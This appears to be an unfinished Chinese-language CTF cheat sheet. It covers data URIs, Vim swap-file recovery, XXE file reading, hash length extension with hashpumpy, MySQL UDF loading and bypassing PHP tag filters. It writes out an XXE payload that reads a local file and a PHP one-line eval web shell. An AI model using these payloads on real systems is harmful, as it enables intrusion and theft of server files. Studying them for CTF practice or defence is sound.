本文最后更新于 1804 天前,其中的信息可能已经有所发展或是发生改变。
Data URI Scheme
data:,<文本数据>
data:text/plain,<文本数据>
data:text/html,<HTML代码>
data:text/html;base64,<base64编码的HTML代码>
data:text/css,<CSS代码>
data:text/css;base64,<base64编码的CSS代码>
data:text/javascript,<Javascript代码>
data:text/javascript;base64,<base64编码的Javascript代码>
data:image/gif;base64,base64编码的gif图片数据
data:image/png;base64,base64编码的png图片数据
data:image/jpeg;base64,base64编码的jpeg图片数据
data:image/x-icon;base64,base64编码的icon图片数据
Vim恢复文件
可能为
index.php.swp index.php~
#修改后缀为.swp使用
vim -r index.php.swp
XXE
XXE(XML External Entity Injection) XML外部实体注入
任意文件读取
<?xml version="1.0"?>
<!DOCTYPE abcd[<!ENTITY any SYSTEM "file:///home/ctf/flag.txt">]>
<something>&any;</something>
待续….
Hash长度扩展攻击
常见hash_extender:
已知hash{secret(已知长度)},求hash{secret (已知长度)|| data (填充字段)|| attacker_controlled_data(自定义字符串)}
hashpumpy:
hashpump(hexdigest, original_data, data_to_add, key_length) return (digest, message)
hashpumpy in Linux
apt install libssl-dev
pip install hashpumpy
python
>>> import hashpumpy
>>> hashpumpy.hashpump(hexdigest, original_data, data_to_add, key_length)
本题:
已知md5(secret(未知长度)+string1),求md5{secret||%00等填充字段||2string}
扩展MySQL函数—UDF
在Linux环境下通常文件为 xxx.so
导入步骤
将文件下载到/usr/lib64/mysql/plugin
进入mysql命令行:
create function help_me returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';
其中help_me为那题的函数名,udf.so是题目文件,加载完拓展函数后就可运行
select help_me();
PHP一句话替代
若<?php?>被 过滤禁止
<script language="php">@eval_r($_POST['pwd'])</script>
PHP反序列化
待续…